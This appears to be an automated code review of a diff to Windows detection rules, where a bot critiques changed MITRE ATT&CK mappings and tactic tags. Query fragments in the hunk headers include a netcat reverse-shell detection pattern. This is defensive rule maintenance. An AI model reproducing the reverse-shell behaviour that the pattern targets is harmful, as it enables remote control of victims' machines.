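Review bot: The Defense Evasion entry now carries T1055 (Process Injection) instead of T1027 (Obfuscated Files or Information), but the query is outside this hunk, so it is not visible whether the rule still keys on a portable executable encoded inside script text, which is what T1027 described. If it does, T1027 is the observed technique and injection is only an inferred follow-on; keeping a T1027 `[[rule.threat.technique]]` next to T1055 under the same TA0005 tactic preserves that coverage without changing the tag set. The tags hunk for this file is also outside the chunk, so the `Tactic: Defense Evasion` tag cannot be checked from here.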
@@ -105,12 +105,10 @@ process where host.os.type == "windows" and event.type == "start" and
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
@@ -121,7 +119,15 @@ id = "T1059.003"
 name = "Windows Command Shell"
 reference = "https://attack.mitre.org/techniques/T1059/003/"
 
+[[rule.threat.technique.subtechnique]]
+id = "T1059.005"
+name = "Visual Basic"
+reference = "https://attack.mitre.org/techniques/T1059/005/"
+
+
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
diff --git a/rules/windows/execution_psexec_lateral_movement_command.toml b/rules/windows/execution_psexec_lateral_movement_command.toml
index fca2338e184..c567451cf8d 100644
--- a/rules/windows/execution_psexec_lateral_movement_command.toml
+++ b/rules/windows/execution_psexec_lateral_movement_command.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/08/26"
 
 [rule]
 author = ["Elastic"]
@@ -94,36 +94,41 @@ sequence by process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1569" name = "System Services" reference = "https://attack.mitre.org/techniques/T1569/" - [[rule.threat.technique.subtechnique]] id = "T1569.002" name = "Service Execution" reference = "https://attack.mitre.org/techniques/T1569/002/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" + +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" + + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/execution_register_server_program_connecting_to_the_internet.toml b/rules/windows/execution_register_server_program_connecting_to_the_internet.toml index 24ce6afd747..d0f7e9bb2f1 100644 --- a/rules/windows/execution_register_server_program_connecting_to_the_internet.toml +++ b/rules/windows/execution_register_server_program_connecting_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] 
@@ -109,7 +109,16 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 21 rule_id = "fb02b8d3-71ee-4af1-bacd-215d23f17efa" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", +] type = "eql" query = ''' @@ -133,11 +142,16 @@ sequence by process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.009" name = "Regsvcs/Regasm" @@ -148,7 +162,10 @@ id = "T1218.010" name = "Regsvr32" reference = "https://attack.mitre.org/techniques/T1218/010/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/execution_revshell_cmd_via_netcat.toml b/rules/windows/execution_revshell_cmd_via_netcat.toml index 1b531f5351e..2ca0d6e9e10 100644 --- a/rules/windows/execution_revshell_cmd_via_netcat.toml +++ b/rules/windows/execution_revshell_cmd_via_netcat.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/14" [rule] 
@@ -52,7 +52,14 @@ Attackers may abuse the NetCat utility to execute commands remotely using the bu
 risk_score = 73
 rule_id = "9c0f61fa-abf4-4b11-8d9d-5978c09182dd"
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Defend"
+]
 timestamp_override = "event.ingested"
 type = "eql"
 
@@ -68,25 +75,10 @@ process.name : ("cmd.exe", "powershell.exe") and process.parent.args : "-e" and
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1095"
-name = "Non-Application Layer Protocol"
-reference = "https://attack.mitre.org/techniques/T1095/"
-
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
@@ -97,7 +89,9 @@ id = "T1059.003"
 name = "Windows Command Shell"
 reference = "https://attack.mitre.org/techniques/T1059/003/"
 
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
diff --git a/rules/windows/execution_scheduled_task_powershell_source.toml b/rules/windows/execution_scheduled_task_powershell_source.toml
index bd57bc91060..67a11ba82f0 100644
--- a/rules/windows/execution_scheduled_task_powershell_source.toml
+++ b/rules/windows/execution_scheduled_task_powershell_source.toml
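Review bot: Dropping the Command and Control entry (T1095/TA0011) leaves a rule that, per the query fragment in the hunk header, fires on `cmd.exe` or `powershell.exe` spawned by netcat with `-e`, mapped only to Execution; the shell bound to a raw socket is the C2 channel, so the removed mapping described the defining behaviour rather than a secondary one. The same pattern, a tactic removed although the detection logic still appears to describe it, recurs for Ingress Tool Transfer in execution_scripting_remote_webdav.toml and for the Lateral Movement entries in execution_scheduled_task_powershell_source.toml and execution_suspicious_cmd_wmi.toml. If a single-tactic-per-rule convention is intended, stating it in the PR description would let reviewers check all four consistently; otherwise the removed entries should be restored together with their `Tactic:` tags.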
@@ -2,7 +2,7 @@ creation_date = "2020/12/15" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/06" [rule] author = ["Elastic"] @@ -61,7 +61,15 @@ references = [ risk_score = 47 rule_id = "5cd55388-a19c-47c7-8ec4-f41656c2fded" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] type = "eql" query = ''' 
@@ -74,36 +82,29 @@ sequence by host.id, process.entity_id with maxspan = 5s [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [[rule.threat.technique.subtechnique]] -id = "T1021.003" -name = "Distributed Component Object Model" -reference = "https://attack.mitre.org/techniques/T1021/003/" +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/execution_scripting_remote_webdav.toml b/rules/windows/execution_scripting_remote_webdav.toml index b8228823b23..bce62a907c5 100644 --- a/rules/windows/execution_scripting_remote_webdav.toml +++ b/rules/windows/execution_scripting_remote_webdav.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/19" [rule] author = ["Elastic"] 
@@ -53,7 +53,20 @@ note = """## Triage and analysis
 risk_score = 73
 rule_id = "ee7726cc-babc-4885-988c-f915173ac0c0"
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Windows Security Event Logs",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: Sysmon",
+ "Data Source: SentinelOne",
+ "Data Source: Crowdstrike",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 
@@ -67,31 +80,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" - [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" + + +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/execution_scripts_archive_file.toml b/rules/windows/execution_scripts_archive_file.toml index c03b2b0d9f8..8bc7d0e44cc 100644 --- a/rules/windows/execution_scripts_archive_file.toml +++ b/rules/windows/execution_scripts_archive_file.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/20" [rule] 
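Review bot: The added `[[rule.threat]]` entry ends with a `Lateral Movement` tactic (TA0008), but the rewritten `tags` list in the previous hunk of this file contains only `Tactic: Execution`, so tags and threat mapping disagree and the rule needs either a `Tactic: Lateral Movement` tag or the new entry removed. The same mismatch appears in execution_via_compiled_html_file.toml and execution_via_mmc_console_file_unusual_path.toml, where `Tactic: Defense Evasion` is dropped from `tags` while the TA0005 `[rule.threat.tactic]` table is kept as context. Separately, T1021.002 (SMB/Windows Admin Shares) is a doubtful fit for a WebDAV path, which the WebClient service serves over HTTP rather than SMB; the removed T1105 Ingress Tool Transfer described the remote fetch more precisely.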
@@ -104,27 +104,20 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - [[rule.threat.technique.subtechnique]] id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - [[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + + diff --git a/rules/windows/execution_shared_modules_local_sxs_dll.toml b/rules/windows/execution_shared_modules_local_sxs_dll.toml index dfd8907197a..26b1f2df891 100644 --- a/rules/windows/execution_shared_modules_local_sxs_dll.toml +++ b/rules/windows/execution_shared_modules_local_sxs_dll.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/28" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] 
@@ -32,7 +32,19 @@ references = ["https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link- risk_score = 47 rule_id = "a3ea12f3-0d4e-4667-8b44-4230c63f3c75" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -48,18 +60,14 @@ file where host.os.type == "windows" and file.extension : "dll" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" +id = "T1129" +name = "Shared Modules" +reference = "https://attack.mitre.org/techniques/T1129/" -[[rule.threat.technique.subtechnique]] -id = "T1574.001" -name = "DLL" -reference = "https://attack.mitre.org/techniques/T1574/001/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/execution_suspicious_cmd_wmi.toml b/rules/windows/execution_suspicious_cmd_wmi.toml index 6d9476b2655..9f27f9612ae 100644 --- a/rules/windows/execution_suspicious_cmd_wmi.toml +++ b/rules/windows/execution_suspicious_cmd_wmi.toml 
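Review bot: Swapping T1574.001 (Hijack Execution Flow: DLL) for T1129 (Shared Modules) changes what this rule claims to see: the hunk header shows it keys on `file.extension : "dll"` file events, and a DLL written into a local side-by-side directory is normally a side-loading primitive, which ATT&CK files under T1574.001 rather than under ordinary shared-module loading. If the goal is to surface the Execution stage as well, keeping T1574.001 as a second `[[rule.threat]]` entry under Defense Evasion (or Persistence) with the matching `Tactic:` tag preserves the hijack coverage. The tags hunk above this one drops `Tactic: Persistence` in step with the mapping, so tags and mapping at least agree with each other.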
@@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/05/20" [rule] author = ["Elastic"] @@ -67,7 +67,20 @@ references = [ risk_score = 73 rule_id = "12f07955-1674-44f7-86b5-c35da0a6f41a" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -81,7 +94,6 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" 
@@ -91,31 +103,15 @@ reference = "https://attack.mitre.org/techniques/T1047/" id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.003" -name = "Distributed Component Object Model" -reference = "https://attack.mitre.org/techniques/T1021/003/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/execution_suspicious_pdf_reader.toml b/rules/windows/execution_suspicious_pdf_reader.toml index 8a753362bf8..c816d82ecd2 100644 --- a/rules/windows/execution_suspicious_pdf_reader.toml +++ b/rules/windows/execution_suspicious_pdf_reader.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/30" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
@@ -76,7 +76,21 @@ This rule looks for commonly abused built-in utilities spawned by a PDF reader p
 risk_score = 21
 rule_id = "53a26770-9cbd-40c5-8b57-61d01a325e14"
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Tactic: Initial Access",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Windows Security Event Logs",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: Sysmon",
+ "Data Source: SentinelOne",
+ "Data Source: Crowdstrike",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 
@@ -99,23 +113,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/windows/execution_suspicious_psexesvc.toml b/rules/windows/execution_suspicious_psexesvc.toml index 63a8aefc8fc..6fcd26f682b 100644 --- a/rules/windows/execution_suspicious_psexesvc.toml +++ b/rules/windows/execution_suspicious_psexesvc.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] 
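Review bot: The Execution entry loses T1204.002 (User Execution: Malicious File) while a new Initial Access entry adds T1566.001 (Spearphishing Attachment); for a rule that triggers on a PDF reader spawning built-in utilities, the user opening the file is the directly observed step and the phishing delivery is inferred, so dropping T1204.002 removes the better-grounded mapping. Keeping `id = "T1204"` with its `T1204.002` subtechnique under TA0002 alongside T1203 preserves it; the same T1204.002 removal appears in execution_scripts_archive_file.toml.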
@@ -80,36 +80,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.003" name = "Rename Legitimate Utilities" reference = "https://attack.mitre.org/techniques/T1036/003/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" - -[[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/execution_via_compiled_html_file.toml b/rules/windows/execution_via_compiled_html_file.toml index ecb2bdda992..15d381da770 100644 --- a/rules/windows/execution_via_compiled_html_file.toml +++ b/rules/windows/execution_via_compiled_html_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] 
@@ -119,7 +119,20 @@ When users double-click CHM files, the HTML Help executable program (`hh.exe`) w risk_score = 47 rule_id = "e3343ab9-4245-4715-b344-e11c56b0a47f" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -132,18 +145,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.001" name = "Compiled HTML File" reference = "https://attack.mitre.org/techniques/T1218/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + 
diff --git a/rules/windows/execution_via_hidden_shell_conhost.toml b/rules/windows/execution_via_hidden_shell_conhost.toml
index c4713761847..df930dae4f7 100644
--- a/rules/windows/execution_via_hidden_shell_conhost.toml
+++ b/rules/windows/execution_via_hidden_shell_conhost.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/17"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 
 [rule]
 author = ["Elastic"]
@@ -76,7 +76,20 @@ references = [
 risk_score = 73
 rule_id = "05b358de-aa6d-4f6c-89e6-78f74018b43b"
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Tactic: Defense Evasion",
+ "Tactic: Privilege Escalation",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: SentinelOne",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 
@@ -94,13 +107,38 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/execution_via_mmc_console_file_unusual_path.toml b/rules/windows/execution_via_mmc_console_file_unusual_path.toml index 2b997f4d88f..52678af5806 100644 --- a/rules/windows/execution_via_mmc_console_file_unusual_path.toml +++ b/rules/windows/execution_via_mmc_console_file_unusual_path.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/19" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] 
@@ -63,7 +63,20 @@ references = ["https://www.elastic.co/security-labs/grimresource"]
 risk_score = 47
 rule_id = "7e23dfef-da2c-4d64-b11d-5f285b638853"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Resources: Investigation Guide", "Data Source: Sysmon"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: SentinelOne",
